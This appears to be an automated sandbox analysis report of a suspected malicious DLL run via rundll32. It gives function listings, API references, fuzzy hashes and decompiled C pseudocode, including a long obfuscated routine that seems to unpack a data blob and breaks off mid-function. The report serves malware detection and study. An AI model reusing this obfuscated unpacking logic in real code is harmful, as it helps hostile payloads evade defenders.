Instruction Fuzzy Hash: D501D43A755223ABCF114E7DCE44E567BA8AB0ABF17260225F919D3244DB24EC01CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 6D476360, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 195COMMON

Download Yara Rule

APIs

__Tolower.LIBCPMT ref: 6D476541
__Tolower.LIBCPMT ref: 6D47655F

Strings

=R-, xrefs: 6D476374, 6D476381

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Tolower
String ID: =R-
API String ID: 2079073131-526339512
Opcode ID: 2b39a54a18b66cc88705e84067fabbf668ed38146a3279c1bd65f527448db16b
Instruction ID: ba53caa79a92189eece10c16bf40264bcd3c3868510b2e558c6ae4d0f09ddf14
Opcode Fuzzy Hash: 2b39a54a18b66cc88705e84067fabbf668ed38146a3279c1bd65f527448db16b
Instruction Fuzzy Hash: BA61A071A04249AFDB14CFA8D884FEEBBB5EF49314F14415DE914A7380C736AD09DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B7C1D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6D4B7CAD

Strings

pow, xrefs: 6D4B7C85, 6D4B7CA2

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: d17adadd0a26647ba0e0a55b029b82124a75908f5c8a7dbc1a19f7938b4c5fd6
Instruction ID: 771380e0f8fc9e27472e3a77cf89ef2e8e80128af332eeb17585f8d318386dda
Opcode Fuzzy Hash: d17adadd0a26647ba0e0a55b029b82124a75908f5c8a7dbc1a19f7938b4c5fd6
Instruction Fuzzy Hash: 42514765E1C703A7CB02BB24C990F7A3BB4AB51741F31C95CE0A542398EB358C959E97

Uniqueness

Uniqueness Score: -1.00%

Function 6D460200, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 6D460258
__Getcvt.LIBCPMT ref: 6D4602B7

Strings

=R-, xrefs: 6D46022C, 6D460238

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Getcvt
String ID: =R-
API String ID: 1921796781-526339512
Opcode ID: 7a3eeec735638b1fb40210beec223f84f8fd087a4d4d8dfd91d2d402e2fc7d81
Instruction ID: 8876010693cc8eb9b2ca1ac684ec1260a9adf825fc054d6eadb56ea009f3bc8b
Opcode Fuzzy Hash: 7a3eeec735638b1fb40210beec223f84f8fd087a4d4d8dfd91d2d402e2fc7d81
Instruction Fuzzy Hash: 595193B1C047589FDB11CFE4C840BEEBBB8FF18304F04825AE955AB241EB74A984CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D46CC00, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__Tolower.LIBCPMT ref: 6D46CCE2
Concurrency::cancel_current_task.LIBCPMT ref: 6D46CD57

Strings

=R-, xrefs: 6D46CC17, 6D46CC1E

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Concurrency::cancel_current_taskTolower
String ID: =R-
API String ID: 2731100635-526339512
Opcode ID: 1a58c44905791375bebbf3017421cd043f6be4d14f2d17f27f975d984f4cffaf
Instruction ID: d13542fd2a1c240b766dc2e963e1b33082bae51c50c4d1fa81a1cfe64c36b8d9
Opcode Fuzzy Hash: 1a58c44905791375bebbf3017421cd043f6be4d14f2d17f27f975d984f4cffaf
Instruction Fuzzy Hash: 064156B0A042809FDB24CF19D444B56BBF0EF59318F24C59DE85A8B791C336E906CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD324, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6D4CD5C5,?,00000050,?,?,?,?,?), ref: 6D4CD3FF

Strings

OCP, xrefs: 6D4CD378
ACP, xrefs: 6D4CD342

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: cf42f35e55068924c36078a873cb45939cbee6843f4b06b9dff94ce57f714b9e
Instruction ID: ee540e570f7a97e85225db797f073506710b60ffbbefc2c32ddc35384966cf5b
Opcode Fuzzy Hash: cf42f35e55068924c36078a873cb45939cbee6843f4b06b9dff94ce57f714b9e
Instruction Fuzzy Hash: B121C46A694106A6E714DE58CD00FDB73AAFBC5B50F678464EA09D7310F732ED01C356

Uniqueness

Uniqueness Score: -1.00%

Function 6D47E014, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 6D47C215: __EH_prolog3_GS.LIBCMT ref: 6D47C21F

std::_Stofx_v2.LIBCPMT ref: 6D47E07F
_ldexpf.LIBCPMT ref: 6D47E0C5

Strings

=R-, xrefs: 6D47E01D

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: H_prolog3_Stofx_v2_ldexpfstd::_
String ID: =R-
API String ID: 1444608790-526339512
Opcode ID: 7dd316b4105fbe25321025e718065a11b65e80eb810a644a7eb73a5c0a2be794
Instruction ID: 602e3d133af048c80559c7e34300df92972d18cf0eb7681ea0b331a5ce1bd10a
Opcode Fuzzy Hash: 7dd316b4105fbe25321025e718065a11b65e80eb810a644a7eb73a5c0a2be794
Instruction Fuzzy Hash: 67312D7291412ADBDB26CF54C880EEAB7BCAB08304F5186AAE519E7241D770EF55CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D472360, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

__Tolower.LIBCPMT ref: 6D4723AF
Concurrency::cancel_current_task.LIBCPMT ref: 6D472434

Strings

=R-, xrefs: 6D472374, 6D47237B

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Concurrency::cancel_current_taskTolower
String ID: =R-
API String ID: 2731100635-526339512
Opcode ID: 75c3d525b3048f8127b67d0a0d6f241fee35d31bd1cfe1cf0efcc9236a8a156a
Instruction ID: ebddd114b3e68ccaece489c5a79b9521c8d321c1690d241eb13fe222ef79ef68
Opcode Fuzzy Hash: 75c3d525b3048f8127b67d0a0d6f241fee35d31bd1cfe1cf0efcc9236a8a156a
Instruction Fuzzy Hash: 3C21CC71A04645AFC330CF29C880EAABBF8EF0A710B15866EE859DB751D731EC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C2781, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,6D4C2BBE,?,?,?,?,?,?), ref: 6D4C282B
GetLastError.KERNEL32(?,6D4C2BBE,?,?,?,?,?,?,?,?,?,?,6D5324C0,00000014,6D4B3C4C,00000000), ref: 6D4C2854

Strings

=R-, xrefs: 6D4C2790

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorFileLastWrite
String ID: =R-
API String ID: 442123175-526339512
Opcode ID: 30350e2e1795b670b3e6882caf74ab5176bc6f985cdd88421c6888fb34c2f8d4
Instruction ID: 3834198656e4b0ab81c17a4c754c7cf45751b70c92408352715a4d7c639ebe91
Opcode Fuzzy Hash: 30350e2e1795b670b3e6882caf74ab5176bc6f985cdd88421c6888fb34c2f8d4
Instruction Fuzzy Hash: 76316F35B002199BCB34CF5ACDC0A9AB3F9FF48301F1185AAE549D7250EB70AD81CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C26A2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,6D4C2BDE,?,?,?,?,?,?), ref: 6D4C273D
GetLastError.KERNEL32(?,6D4C2BDE,?,?,?,?,?,?,?,?,?,?,6D5324C0,00000014,6D4B3C4C,00000000), ref: 6D4C2766

Strings

=R-, xrefs: 6D4C26B1

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorFileLastWrite
String ID: =R-
API String ID: 442123175-526339512
Opcode ID: fddcc750a8404766cea7f80a8621ea74bf5e565754d044627478e217c09b0b9e
Instruction ID: 46061dfc49d870d46fc9ff5a8cc3da3f0a794b333f43ecb2b53d4f1915575836
Opcode Fuzzy Hash: fddcc750a8404766cea7f80a8621ea74bf5e565754d044627478e217c09b0b9e
Instruction Fuzzy Hash: 51216F39B002199FCB25CF69C9C0BE9B7F8FB48341F1144AAE946D7240DB70AE85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C22D0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4C2348

Strings

DTm, xrefs: 6D4C2303
HTm, xrefs: 6D4C2315

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free
String ID: DTm$HTm
API String ID: 269201875-2435632002
Opcode ID: 9c45274a6e8af62c446f1d1fcc86b5b3bff65d297180ef8683444ca852aa02eb
Instruction ID: af1f8f997447600e55b5ebc96017d885417481b4998f513798888fbb771f9472
Opcode Fuzzy Hash: 9c45274a6e8af62c446f1d1fcc86b5b3bff65d297180ef8683444ca852aa02eb
Instruction Fuzzy Hash: 2D11B4791083029FE770CF3DD480F5677E8EB167A8B30942EE5998B651DBB19C4187A2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C454A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 6D4C45AA
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 6D4C45B7

Strings

=R-, xrefs: 6D4C455E, 6D4C459A, 6D4C45C1, 6D4C45C9

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID: =R-
API String ID: 2279764990-526339512
Opcode ID: 3cc19717577409323098b146c20ec93aa0787c8d3272a790479b5d4b9608a1b7
Instruction ID: 49e191bd66b9eb9177df761e5f24dd0d865e7590459ed7ee8a3cb4fa6fcb140e
Opcode Fuzzy Hash: 3cc19717577409323098b146c20ec93aa0787c8d3272a790479b5d4b9608a1b7
Instruction Fuzzy Hash: 0311983FA115219B9F229D2DDA40E6637A5AB8D3A07134220EF59EB744E731FD0186D2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C5F71, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 6D4C6007
GetLastError.KERNEL32 ref: 6D4C6015
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6D4C6070

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: d6dd633b63b2fe89919789d9cf623f97647acc3686a301fab28e76bd238b15a2
Instruction ID: 61d72aef1f7ea1925916033413172f8c401f68437eba1a38f4e8ca5d94da0ca8
Opcode Fuzzy Hash: d6dd633b63b2fe89919789d9cf623f97647acc3686a301fab28e76bd238b15a2
Instruction Fuzzy Hash: 0B41E739604216AFDB11CF6AC844F7A7BB5EF03314F21C25DE958672A1DB318D42C7A2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6552 Parent PID: 6444 rundll32.exeCOMMON

Executed Functions

Function 6D4BDEDB, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6D4BDEDB(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x6d5341e0; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6D4BF58C(_t11, 1, 0x364); // executed
					_t15 = _t3;
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E6D4C48FD(_t13, _t16, __eflags,  *0x6d5341e0, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E6D4BDB97(_t13, _t15, 0x6d540730);
							E6D4C02CE(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E6D4C02CE();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E6D4C48A7(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x6d4bdedb
0x6d4bdee6
0x6d4bdee8
0x6d4bdeea
0x6d4bdeef
0x6d4bdef2
0x6d4bdf00
0x6d4bdf07
0x6d4bdf0c
0x6d4bdf0f
0x6d4bdf12
0x6d4bdf24
0x6d4bdf29
0x6d4bdf2b
0x6d4bdf36
0x6d4bdf3c
0x6d4bdf44
0x6d4bdf46
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4bdf2d
0x6d4bdf2d
0x00000000
0x6d4bdf2d
0x6d4bdf14
0x6d4bdf14
0x6d4bdf15
0x6d4bdf15
0x6d4bdf48
0x6d4bdf49
0x6d4bdf49
0x6d4bdef4
0x6d4bdefa
0x6d4bdefe
0x6d4bdf51
0x6d4bdf52
0x6d4bdf58
0x00000000
0x00000000
0x00000000
0x6d4bdefe
0x6d4bdf5f

APIs

GetLastError.KERNEL32(00000001,00000001,6D4D78BD,6D4B41FE,6D4C185A,6D4D78BB,?,6D491D91,6D4D78BD,6D4D78BB,00000000,00000000,?,6D45140C,6D4D78BF,6D4D78BF), ref: 6D4BDEE0
_free.LIBCMT ref: 6D4BDF15
_free.LIBCMT ref: 6D4BDF3C
SetLastError.KERNEL32(00000000,6D4D78BF), ref: 6D4BDF49
SetLastError.KERNEL32(00000000,6D4D78BF), ref: 6D4BDF52

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 67ff05166153823f39a0d1fc125da1968a836a2430a76a5cf5e8fe01dbe0c9a9
Instruction ID: c231fee8f303f25c348a00c1e1bc0176ea73fec657a03491ce655016503f57b7
Opcode Fuzzy Hash: 67ff05166153823f39a0d1fc125da1968a836a2430a76a5cf5e8fe01dbe0c9a9
Instruction Fuzzy Hash: 6001493E10C60126DE0286394C84F1A2E79ABE63BAB33416DF60E93381FF31CC0181B5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D8410, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 1158
sleepCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E6D4D8410(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed char _v69;
				signed int _v70;
				signed int _v71;
				signed char _t384;
				void* _t386;
				intOrPtr* _t387;
				void* _t392;
				signed int _t394;
				signed int _t398;
				signed int _t400;
				intOrPtr _t403;
				signed int _t405;
				signed int _t409;
				intOrPtr _t410;
				intOrPtr _t420;
				signed int _t422;
				void* _t424;
				signed char _t427;
				signed int _t434;
				void* _t435;
				signed int _t442;
				signed int _t444;
				intOrPtr* _t451;
				signed int _t461;
				signed int _t466;
				signed int _t467;
				signed int _t471;
				signed int _t472;
				signed int _t484;
				signed int _t487;
				signed char _t489;
				signed int _t490;
				signed int _t491;
				signed int _t495;
				signed int _t497;
				signed char _t501;
				signed int _t502;
				void* _t504;
				signed int _t521;
				intOrPtr _t522;
				signed int _t528;
				signed int _t529;
				signed int _t534;
				signed int _t537;
				void* _t541;
				signed int _t547;
				signed int _t552;
				signed int _t556;
				signed int _t557;
				signed int _t563;
				signed int _t564;
				signed char _t567;
				void* _t571;
				intOrPtr _t593;
				signed char _t603;
				signed char _t612;
				signed int _t615;
				signed int _t626;
				signed char _t628;
				signed int _t631;
				signed int _t640;
				signed int _t648;
				signed int _t654;
				signed int _t655;
				signed int _t665;
				signed int _t669;
				signed char _t670;
				signed int _t672;
				signed int _t674;
				signed int _t675;
				signed int _t677;
				signed char _t678;
				signed int _t680;
				void* _t681;
				signed int _t683;
				signed int _t685;
				signed int _t686;
				signed int _t690;
				signed int _t702;
				signed int _t710;
				void* _t716;
				signed int _t717;
				signed int _t721;
				signed int _t723;
				signed int _t724;
				intOrPtr* _t726;
				void* _t730;
				intOrPtr* _t735;
				signed int _t740;
				void* _t741;
				intOrPtr _t744;
				intOrPtr* _t746;
				signed int _t748;
				signed int _t752;
				signed char _t765;
				signed char _t766;
				signed char _t767;
				signed char _t768;
				signed int _t769;
				intOrPtr* _t772;
				signed int _t778;
				signed int _t780;
				signed int _t784;
				signed char _t789;
				signed int _t798;
				intOrPtr _t799;
				signed int _t802;
				void* _t811;
				signed int _t813;
				void* _t816;
				signed char _t820;
				signed char _t822;
				signed int _t830;
				signed int _t833;
				signed int _t834;
				signed int _t839;
				signed int _t849;
				signed int _t852;
				signed int _t860;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed char _t869;
				signed int _t870;
				intOrPtr* _t871;
				intOrPtr _t872;
				signed char _t875;
				signed int _t876;
				signed int _t878;
				intOrPtr _t881;
				signed int _t882;
				signed int _t883;
				signed char _t884;
				signed int _t886;
				signed int _t888;
				signed int _t892;
				signed int _t893;
				signed int _t895;
				signed int _t898;
				signed int _t904;
				void* _t908;
				intOrPtr _t909;
				signed int _t910;
				signed int _t911;
				signed int _t913;
				signed int _t914;
				signed int _t916;
				signed int _t920;
				signed int _t921;
				void* _t922;
				signed int _t923;
				void* _t926;
				signed int _t931;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t941;
				void* _t943;
				signed int _t944;
				intOrPtr* _t945;
				signed int _t946;
				signed int _t948;
				signed int _t950;
				signed int _t953;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				void* _t958;
				void* _t959;
				signed int _t960;
				signed int _t962;
				signed int _t963;
				signed int _t965;
				signed int _t967;
				void* _t982;
				void* _t986;
				void* _t990;
				void* _t1004;
				void* _t1017;
				void* _t1026;
				void* _t1032;
				void* _t1037;

				_t384 =  *0x6d534a34; // 0x19
				_t859 = __ecx;
				_t723 = _t384 & 0x000000ff;
				_t1 = _t859 - 0xb84; // -2948
				_t908 = _t1 + _t723;
				_v8 = __ecx;
				_v16 = 0x1a;
				_v69 = _t384;
				if( *0x6d534a0c == 0x1626) {
					_t665 =  *0x6d534a28; // 0x2445b902
					_v16 = _t665 + _t665 * 4 + 0xffffff7e;
				}
				_t860 =  *0x6d534a50; // 0x0
				_t936 = _t860;
				_t669 =  *0x6d534a30; // 0x325d3a46
				_t386 = _t936 - _t723;
				_v12 = _t936;
				_v52 = _t669;
				_t10 = _t386 + 2; // 0x2
				_t724 = _t10;
				_v20 = _t724;
				 *0x6d5349e0 = _t724;
				_t982 =  *0x6d534a10 - _t669; // 0xfffbdc66
				if(_t982 <= 0) {
					 *0x6d534a10 = _t936;
					_t860 = _t669 * _t936 * 0x14b9;
					 *0x6d534a50 = _t860;
					_v12 = _t860;
					_t724 = _t860 - _t669 + _t669 + 0x54 + _v20 + _t936;
					 *0x6d5349e0 = _t724;
				}
				_t937 =  *0x6d5349e4; // 0x1e37fef4
				if( *0x6d534a0c == 0x1626) {
					_t937 = _t937 + (_v69 -  *0x6d534a28 & 0x000000ff) * 0xfffffffa;
					 *0x6d5349e4 = _t937;
				}
				_t387 = 0x6d534a84;
				asm("o16 nop [eax+eax]");
				do {
					_t986 = _t908 -  *0x6d534a00; // 0x2445b905
					if(_t986 != 0) {
						 *_t387 =  *_t387 + _t908;
						_t937 = _t937 + _t860 - _t908 + 0x2a;
						_t16 = _t908 - 2; // -2950
						_t860 = _t16 + _t937;
						 *0x6d534a50 = _t860;
					}
					_t387 = _t387 - 4;
				} while (_t387 > 0x6d5349fc);
				 *0x6d5349e4 = _t937;
				_t938 = _v16;
				_t726 = 0x6d534a84;
				_v20 = _t724 - (_v12 + _v12 * 0x00000002 << 0x00000004) & 0x0000ffff;
				do {
					_t990 = _t669 -  *0x6d534a00; // 0x2445b905
					if(_t990 != 0) {
						 *_t726 =  *_t726 + _t669;
						_t392 = _t860 - _t669 + _t938;
						_t23 = _t669 + 0x28; // 0x325d3a6e
						_t860 = _t23 + _t392;
						_t938 = _t392 + 0x2a;
						 *0x6d534a50 = _t860;
					}
					_t726 = _t726 - 4;
				} while (_t726 > 0x6d5349fc);
				_t939 =  *0x6d5349e4; // 0x1e37fef4
				_t394 = _v8 + _t939 + 0xfffff47c;
				_v12 = _t394;
				 *0x6d55a2bc = 0x6d5411a0;
				 *0x6d534a34 = _t394 + 0x47 + _v20;
				_t941 = E6D4D9980();
				_t866 =  *0x6d534a50; // 0x0
				_t398 = _v12;
				 *0x6d5349e4 = _t941;
				if( *0x6d534a0c == 0x1626) {
					_t866 = _t866 -  *0x6d534a28;
					_t398 = _t398 + _t866 * 0xfffffffa;
				}
				_t909 =  *0x6d5349f4; // 0xb4
				_t400 = _t398 + 0x47 + _t866;
				_v12 = _t400;
				_t730 = ( *0x6d534a34 & 0x000000ff) - _t400 + 2;
				 *0x6d534a34 = _t400 - 2 + _t730;
				_t403 =  *0x6d5349f0; // 0xc8
				if(_t403 - _t909 != 0x23c) {
					_t910 = _t909 - _t866;
					__eflags = _t910;
					_t867 = _t910 + _t941;
				} else {
					_t867 = _t866 + 0xfffffffe + _t730;
				}
				 *0x6d534a50 = _t867;
				_t405 = E6D4D96E0();
				_t911 = _v12;
				 *0x6d5349e4 = _t405;
				_t943 = _t911 - (( *0x6d534a34 & 0x000000ff) + ( *0x6d534a34 & 0x000000ff) * 2 << 4);
				if( *0x6d534a0c == 0x1626) {
					_t654 =  *0x6d534a50; // 0x0
					_t655 = _t654 -  *0x6d534a28;
					 *0x6d534a50 = _t655;
					_t911 = _t911 + _t655 * 0xfffffffa;
				}
				_t409 = E6D4D9980();
				_t868 =  *0x6d534a50; // 0x0
				 *0x6d5349e4 = _t409;
				_t38 = _t868 - 0xb84; // -2948
				_v24 = _t38 + _t911;
				if(_t943 >= _t868) {
					 *0x6d534a14 =  *0x6d534a14 - _t409;
					_t943 = _t868 - _t409 + 2;
				}
				_t410 =  *0x6d5349e8; // 0x0
				_t670 =  *0x6d534a34; // 0x19
				_v16 = 0x4290;
				_t735 = 0x6d534a84;
				_v56 = _t410 - _t943 + 0x00000002 & 0x0000ffff;
				_t944 = _v56;
				asm("cdq");
				asm("sbb edx, [0x6d5349ec]");
				_v20 = (_t670 & 0x000000ff) -  *0x6d5349e8 +  *0x6d534a50;
				asm("adc edx, 0x0");
				_v12 = _t868;
				do {
					if( *0x6d534a00 != 0x50) {
						 *_t735 =  *_t735 + 0x50;
						_t944 = _t944 + (_t670 & 0x000000ff) - 0x26;
						_v56 = _t944;
						_t670 = _v56 + 0x4e;
						 *0x6d534a34 = _t670;
					}
					_t735 = _t735 - 4;
				} while (_t735 > 0x6d5349fc);
				_t913 =  *0x6d5349e4; // 0x1e37fef4
				_t945 = 0x6d5349f4;
				_v69 = _t670;
				_t672 = _v52;
				_t869 = _v69;
				asm("o16 nop [eax+eax]");
				do {
					_t1004 = _t913 -  *0x6d534a04; // 0x2445b98f
					if(_t1004 == 0) {
						goto L31;
					}
					asm("adc eax, eax");
					_v20 = _v20 + (_t869 & 0x000000ff) - _t913 + 0x2a +  *_t945;
					_t740 = _v12;
					asm("adc ecx, eax");
					_t420 =  *0x6d5349f8; // 0xe
					_v12 = _t740;
					if(_v20 == _t420 && _t740 == 0) {
						break;
					}
					L31:
					_t945 = _t945 + 4;
				} while (_t945 < 0x6d534aa0);
				_t914 = _v16;
				_t741 = 0;
				do {
					_t56 = _t741 + 0x6d50f740; // 0xb71b5e81
					_t741 = _t741 + 1;
					 *((char*)(_t741 + 0x6d54119f)) =  *_t56;
					_t914 = _t914 - 1;
				} while (_t914 != 0);
				_t422 =  *0x6d534a50; // 0x0
				 *0x6d5349e8 = _t422 + 0x97;
				asm("adc ecx, ecx");
				 *0x6d5349ec = _t914;
				_t424 = E6D4D96E0();
				_t744 =  *0x6d5349e8; // 0x0
				_t746 = 0x6d534a84;
				_v56 = _t424 + _t744 + 0xffffffda & 0x0000ffff;
				_t427 =  *0x6d534a34; // 0x19
				_t870 = _v56;
				do {
					if( *0x6d534a00 != 0x50) {
						 *_t746 =  *_t746 + 0x50;
						_t870 = _t870 + (_t427 & 0x000000ff) - 0x26;
						_v56 = _t870;
						_t427 = _t870 + 0x4e;
						 *0x6d534a34 = _t427;
					}
					_t746 = _t746 - 4;
				} while (_t746 > 0x6d5349fc);
				if( *0x6d534a0c == 0x1626) {
					_t427 = _t427 -  *0x6d534a28;
					 *0x6d534a34 = _t427;
				}
				_t946 = _v24;
				_t916 = _t946 - ((_t427 & 0x000000ff) + (_t427 & 0x000000ff) * 2 << 4);
				_t434 = E6D4D9980();
				_t748 =  *0x6d534a50; // 0x0
				_t871 = 0x6d534a84;
				 *0x6d5349e4 = _t434;
				do {
					_t1017 = _t672 -  *0x6d534a00; // 0x2445b905
					if(_t1017 != 0) {
						 *_t871 =  *_t871 + _t672;
						_t435 = _t748 - _t672 + _t946;
						_t748 = _t672 + 0x28 + _t435;
						_t67 = _t435 + 0x2a; // 0x2a
						_t946 = _t67;
						 *0x6d534a50 = _t748;
					}
					_t871 = _t871 - 4;
				} while (_t871 > 0x6d5349fc);
				_t872 =  *0x6d534a3c; // 0x2445b8ee
				_t948 = _t748 - (_t946 + _t946 * 2 << 4);
				_v16 = 0x23cf1aa;
				if(_t872 != 1) {
					_t852 =  *0x6d5349e4; // 0x1e37fef4
					_t748 = _t852 - (_t916 + _t916 * 2 << 4);
					 *0x6d534a50 = _t748;
				}
				if(_t872 == 1) {
					_t948 = _t748 - (_t672 + _t672 * 2 << 4);
					__eflags = _t948;
				} else {
					 *0x6d534a50 = _t672 - (_t948 + _t948 * 2 << 4);
				}
				_t442 = E6D4D9980();
				_t752 =  *0x6d534a50; // 0x0
				_v64 = _t442;
				_t920 = _t752;
				_v60 = _t752;
				_v12 = 0xf;
				_t81 = _t752 - 0xb84; // -2948
				_v20 = 0x7d;
				_t444 = _t81 + _t948;
				_t875 = _t672 + 0x47 + _t444;
				_v24 = _t444;
				_t950 = _v24;
				_v70 = _t875;
				_t674 = _t672 - (_t875 & 0x000000ff) + (_t875 & 0x000000ff) * 4 - _t950;
				_v52 = _t674;
				 *0x6d534a30 = _t674;
				if( *0x6d534a0c == 0x1626) {
					_t752 = _t752 -  *0x6d534a28;
					_t920 = _t752;
					_v60 = _t752;
					 *0x6d534a50 = _t752;
					_t950 = _t950 + _t752 * 0xfffffffa;
				}
				_v32 = 0xbb;
				_v24 = 0;
				_t953 =  ~_t920 - _t950 * 4;
				_v68 = _t953 - _t920 + 2;
				_t451 = 0x6d534a84;
				do {
					_t1026 = _t674 -  *0x6d534a00; // 0x2445b905
					if(_t1026 != 0) {
						 *_t451 =  *_t451 + _t674;
						_t953 = _t953 + _t752 - _t674 + 0x2a;
						_t752 = _t674 - 2 + _t953;
						 *0x6d534a50 = _t752;
					}
					_t451 = _t451 - 4;
				} while (_t451 > 0x6d5349fc);
				_t921 =  *0x6d534a14; // 0x6ef97106
				_t955 = 2 - (_t953 + _t953 * 2 << 4);
				_v60 = _t752;
				if(2 >= _t752) {
					_t921 = _t921 - _t674;
					 *0x6d534a14 = _t921;
					_t955 = _t752 - _t674 + 2;
				}
				_v56 = _t674;
				_t675 = _v68;
				_t956 = _v52;
				_v28 = _t752 * _t955 * 0x14b9;
				while(1) {
					_v24 = _v24 + 1;
					_t876 = _v64;
					_t677 = _t675 + 0x2a + (_t875 & 0x000000ff) - _v28;
					_v52 = _t677;
					_v68 = _t876;
					_t1032 =  *0x6d534a10 - _t876; // 0xfffbdc66
					if(_t1032 <= 0) {
